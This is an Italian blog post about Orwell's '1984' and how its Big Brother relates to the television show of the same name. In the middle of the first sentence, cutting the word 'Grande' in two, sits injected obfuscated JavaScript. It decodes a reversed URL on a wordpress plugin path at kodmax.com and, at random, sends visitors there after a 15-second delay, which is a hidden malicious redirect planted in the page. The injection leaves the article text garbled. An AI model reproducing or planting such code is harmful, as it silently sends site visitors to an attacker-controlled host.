Il Grande Fratello, quello vero

image_pdfimage_print

Tornato sulla bocca di tutti grazie al successo dell’omonima trasmissione televisiva, in realtà il Gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande Fratello è stato inventato più di cinquant’anni fa da George Orwell. Il Grande Fratello, inquietante protagonista del romanzo “1984”, è un misterioso capo politico che nessuno ha mai visto e che controlla e domina la popolazione. Un occhio sempre attento che scruta non solo le azioni ma anche i pensieri dei cittadini. Nessuno è libero di pensare, di scrivere, di comunicare, né di mettere in discussione il sistema. Tutti devono sottostare e sono schiavi della dittatura del Grande Fratello che impone e crea una Verità sottoponendo anche il passato a continue revisioni. 1984 è un libro tragicamente profetico, nel quale Orwell ha immaginato e descritto il controllo delle coscienze da parte del potere, che teme una cosa sola: il libero pensiero.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *